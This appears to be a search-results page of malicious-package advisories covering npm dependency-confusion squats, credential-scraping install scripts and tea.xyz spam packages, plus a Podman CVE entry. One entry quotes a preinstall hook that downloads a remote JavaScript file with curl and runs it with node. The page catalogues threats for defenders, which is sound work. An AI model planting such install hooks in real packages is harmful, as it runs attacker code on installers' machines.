1506 matches found
Malicious code in sn-internal-test (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...
Malicious code in menu-filter-widget-web (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bed4a7ece362ef59f2b621b3f64d06e899740c8ca8d73e437145d48b960187ce package.json declares a postinstall lifecycle hook that runs callback.js on every npm install. callback.js reads os.hostname and sends it to a...
Malicious code in @dktunited/anly-tracker-v2 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a8893b914c3ba3139a3c8cede191521742237aa7c1c5d64f7ee45dbc5f636a6 scripts/postinstall.js runs unconditionally during npm install and exfiltrates installer-side identifiers to an attacker-controlled out-of-band...
Malicious code in savant-listing (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461 [email protected] is a dependency-confusion squat. package.json declares both install and postinstall lifecycle scripts that run curl...
Malicious code in @service-suppliers/suppliers (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a79ca8ef6257be2fbac9c361b969d9e63ce6a833e42dafa4b558e1f805276502 On npm install, scripts/postinstall.js performs two attacker-benefit actions against the installer. First, it scrapes installer-side credentials: it...
MAL-2026-4438 Malicious code in @service-suppliers/suppliers (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a79ca8ef6257be2fbac9c361b969d9e63ce6a833e42dafa4b558e1f805276502 On npm install, scripts/postinstall.js performs two attacker-benefit actions against the installer. First, it scrapes installer-side credentials: it...
MAL-2026-3748 Malicious code in @pelmnaads/naads-common-logger (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 68990dfacdc750bf464d646aca4855c2dd23bbefcadef1d9638e2d663a23fc57 The package is published to the public npm registry under @pelmnaads/naads-common-logger with version 19999.0.1 — the canonical dependency-confusion...
K000159927: Podman vulnerabilities CVE-2022-1227 and CVE-2022-27649
Security Advisory Description CVE-2022-1227 A privilege escalation flaw was found in Podman. This flaw allows an attacker to publish a malicious image to a public registry. Once this image is downloaded by a potential victim, the vulnerability is triggered after a user runs the 'podman top'...
Malicious code in jwt-firebase-izar-gulp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fefa055bc041a85bb3553177d9546eb4d5599e738c2a450136a9abab5d66370a This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
EUVD-2025-136045
Malicious code in itale-dci-rfsrgget npm...
MAL-2025-183252 Malicious code in kisut-diufg-danuamifuifoa (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 98bfd58a7a46d32c702eccbf08b86194d39901377f49262a8299bd0f336fc165 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
MAL-2025-180988 Malicious code in teate-thy-sonic-tunej (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f410e961b54fbef72c7a43497c96c79fdf7f8b6f5f979e21142ac9e6ac98ae6 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
MAL-2025-172730 Malicious code in afri-zidan-tea (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f400148bba6b3621df9416a94fa5101173cc2970f43dffe52dae7a775ac0dff5 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
MAL-2025-177061 Malicious code in nuyar-adamr-ada (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0428b778941c5cd43b2870c541c78c0bb997c52dae817706b19980be436cd4e3 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
Malicious code in mnaf-saif-cuagu (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f80a945370255753cafc7e5a2fd7951bb3a574ac2df2043d4c3b4f6d89070307 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
Malicious code in polymer-agiagaihha-aftfsafyag (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 284815cce4028f3a014bf457e4048250b6f68c436224e8b97747ec41260e2b62 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
Malicious code in kapvino-saufdggfoi-ugaha (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 481fbbb8e79ebc52274c679e23b6b6e2309538dda031d13e43ce02e533ef71ba This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
Malicious code in miaandss-nutar-esnuru (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8095c84e52779a3476eb0c0a7a3b23087b1cc80dbd94a4ee2f607c112b290a30 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
MAL-2025-175337 Malicious code in kapvino-sogdai-dgagagu (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e6983ad5435cc960c674f4c8df3c723fb5e70da75eecbeb8e8805c62f90ebac8 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
MAL-2025-171444 Malicious code in kashifabdul (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2088c907bbdfbd0e18785d48f11a570fd3ac413e496436c33d1fe396f14db648 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...